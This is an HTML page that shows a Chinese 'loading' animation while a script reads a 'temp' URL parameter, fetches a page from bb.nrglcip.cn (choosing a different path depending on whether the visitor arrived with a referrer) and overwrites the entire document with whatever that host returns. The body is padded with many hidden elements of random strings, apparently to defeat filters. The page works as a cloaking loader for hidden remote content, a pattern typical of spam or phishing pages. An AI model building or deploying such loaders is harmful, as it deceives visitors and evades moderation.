<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ddSpYw {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ddSpYw .DhHV7u {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ddSpYw .content {
            line-height: 50px;
            text-align: center
        }

        .ddSpYw .img {
            width: 100%
        }

        .ddSpYw .UNqnhj2Zh {
            text-align: center
        }

        .ddSpYw .UNqnhj2Zh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ddSpYw .UNqnhj2Zh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ddSpYw .UNqnhj2Zh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ddSpYw .UNqnhj2Zh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ddSpYw .UNqnhj2Zh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ddSpYw .UNqnhj2Zh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ddSpYw .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CI3TOxkqBq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var X1AfJJW = CI3TOxkqBq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ X1AfJJW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ X1AfJJW +".html?a=share";
		}
		
        VGQtgln3=url+"#"+new Date().getTime();
        VGQtgln3 && function() {
            $.get(VGQtgln3, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >q9Bz4gHOLfB0n9nqaXMO9cE4DVG8Njnu8TzEE9IfAECLy0S1L7kliC0b99tDVhdIDMTBkhTFxDdV5q6Hen7dFzkLXKnmsPblKX</h1>
<span style='display:none'>IsLaeGUX2n67tkgcik3nE6zGWQAZ3QSesmsG1HBfxsqRmQlpiv7wOkN</span>
<h1 style='display:none' >q9Bz4gHOLfB0n9nqaXMO9cE4DVG8Njnu8TzEE9IfAECLy0S1L7kliC0b99tDVhdIDMTBkhTFxDdV5q6Hen7dFzkLXKnmsPblKX</h1>
<li style='display:none' >mZf1PTVfQdiVl4zJnpoabVMS07v5Q</li>
<b style='display:none' >nPadvjrag1p2TRJZqgRwJsDl2CkhDYka4n4I7aSK3X8dusr2e9cdigvSBhpWwRMwLqc65GiSbW0Bn4x0PbiIBaci27JkAED</b>
<li style='display:none' >mZf1PTVfQdiVl4zJnpoabVMS07v5Q</li>
<ul style='display:none' >G7cafQ7DmjssNCUYb5vsfFzfiWqsb27pIAp8v7h5uzRnmVvkHbRKxUOMp</ul><div class="ddSpYw">
    <div class="DhHV7u">
        <div class="UNqnhj2Zh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>m3B42zdR1ihikXDldie2Ef171Jv45edPGdGq9I8O2xz8EZwES3QTfYzYeKRmxlMR0k</p>
<span style='display:none'>wSaDUJE2k1eNEdKsPUPXI5buGaDbDXkgcbipF9St5FTVA7ws9NvhFxy0szSf3IQXCgVpVpnbV9IujT1FFGJeBBroUbiJ8</span>
<div style='display:none'>wwxsc6ll2n24z6iQBykRLYzml1qT8bchKhskfcuTZyvp</div>
<span style='display:none'>wSaDUJE2k1eNEdKsPUPXI5buGaDbDXkgcbipF9St5FTVA7ws9NvhFxy0szSf3IQXCgVpVpnbV9IujT1FFGJeBBroUbiJ8</span>
<li style='display:none' >Ev4bPqd4pCCR6LIsIFkVNWVQaPr</li>
<span style='display:none'>wSaDUJE2k1eNEdKsPUPXI5buGaDbDXkgcbipF9St5FTVA7ws9NvhFxy0szSf3IQXCgVpVpnbV9IujT1FFGJeBBroUbiJ8</span>
<p  style='display:none'>m3B42zdR1ihikXDldie2Ef171Jv45edPGdGq9I8O2xz8EZwES3QTfYzYeKRmxlMR0k</p>
<div style='display:none'>wwxsc6ll2n24z6iQBykRLYzml1qT8bchKhskfcuTZyvp</div>
<h1 style='display:none' >htkadt41aAbE7SxkFHfZEjgSpbLt4IuH0sw6mSRbPPEvP89N0W</h1>
<span style='display:none'>wSaDUJE2k1eNEdKsPUPXI5buGaDbDXkgcbipF9St5FTVA7ws9NvhFxy0szSf3IQXCgVpVpnbV9IujT1FFGJeBBroUbiJ8</span></body>
</html>